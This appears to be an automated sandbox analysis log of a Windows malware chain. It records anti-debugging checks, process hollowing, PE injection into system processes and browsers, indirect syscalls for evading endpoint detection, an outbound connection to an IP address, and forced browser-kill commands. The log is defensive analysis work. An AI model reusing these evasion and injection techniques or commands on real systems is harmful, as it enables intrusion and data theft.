Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A70DA1 rdtsc

0_2_04A70DA1

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F636EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_00007FF643F636EC

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F62348 GetLastError,IsDebuggerPresent,OutputDebugStringW,

9_2_00007FF643F62348

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027652B mov eax, dword ptr fs:[00000030h]	0_2_0027652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0027A302 mov eax, dword ptr fs:[00000030h]	0_2_0027A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FEA302 mov eax, dword ptr fs:[00000030h]	2_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FE652B mov eax, dword ptr fs:[00000030h]	2_2_00FE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FEA302 mov eax, dword ptr fs:[00000030h]	3_2_00FEA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FE652B mov eax, dword ptr fs:[00000030h]	3_2_00FE652B

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F81EF8 GetProcessHeap,

9_2_00007FF643F81EF8

Source: C:\Windows\System32\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F636EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF643F636EC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F62798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00007FF643F62798
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F638CC SetUnhandledExceptionFilter,	9_2_00007FF643F638CC
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: 9_2_00007FF643F6CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF643F6CA44
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845A36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF6845A36EC
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845A2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF6845A2798
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845A38CC SetUnhandledExceptionFilter,	11_2_00007FF6845A38CC
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Code function: 11_2_00007FF6845ACA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF6845ACA44
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4E3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF711D4E3EC
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4E6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF711D4E6D0
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D5364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF711D5364C
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Code function: 12_2_00007FF711D4E8B0 SetUnhandledExceptionFilter,	12_2_00007FF711D4E8B0
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDACA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF61DDACA44
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDA36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF61DDA36EC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDA38CC SetUnhandledExceptionFilter,	13_2_00007FF61DDA38CC
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Code function: 13_2_00007FF61DDA2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00007FF61DDA2798

Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: FBFF.tmp.fcxcx.exe.20.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.81.68.147 80
Source: C:\Windows\explorer.exe	Domain query: support.mozilla.org

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 protect: page execute read

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\svchost.exe	Thread created: C:\Windows\explorer.exe EIP: 89BAA50
Source: C:\Windows\explorer.exe	Thread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: 2C28AA50
Source: C:\Windows\explorer.exe	Thread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: AA10AA50
Source: C:\Windows\explorer.exe	Thread created: C:\Program Files\Mozilla Firefox\firefox.exe EIP: 636DAA50
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 7041AA50
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: DD3DAA50
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9452AA50

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	NtUnmapViewOfSection: Indirect: 0x7FF68E6923DC
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	NtUnmapViewOfSection: Indirect: 0x7FF61B9823DC

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5A
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 89A0000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000 value starts with: 4D5A
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe

Memory written: PID: 3968 base: 89A0000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Thread register set: target process: 4812
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Thread register set: target process: 5048
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Thread register set: target process: 4952
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Thread register set: target process: 5212
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Thread register set: target process: 5956
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Thread register set: target process: 6760

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6BCBD0000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF6BCBD0000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF7DF220000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6DAB80000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF227000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\svchost.exe base: C5B80A8010
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD1000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD5000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD7000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD8000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD9000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBDA000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\msiexec.exe base: 48EE857010
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB87000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Memory written: C:\Windows\System32\audiodg.exe base: BE8C9A8010
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 89A0000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000
Source: C:\Windows\explorer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD1000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD5000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD7000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD8000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBD9000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF6BCBDA000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\msiexec.exe base: 6F9A273010
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF220000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF221000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF225000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF227000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF228000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF229000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7DF22A000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\svchost.exe base: 24DA922010
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB81000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB85000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB87000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB88000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB89000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF6DAB8A000
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2597563010

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"

Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: 602c785fe5.exe, 0000001B.00000002.2524820308.0000000000622000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000014.00000000.2217813962.00000000096A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3077307447.00000000096A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: skotes.exe, skotes.exe, 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: gProgram Manager
Source: explorer.exe, 00000014.00000000.2202639819.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000014.00000000.2203536690.0000000001081000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Code function: 9_2_00007FF643F88D10 cpuid

9_2_00007FF643F88D10

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoEx,FormatMessageA,	9_2_00007FF643F5DF9C
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_00007FF643F84568
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: GetLocaleInfoW,	9_2_00007FF643F84618
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_00007FF643F8474C
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Code function: EnumSystemLocalesW,	9_2_00007FF643F78874
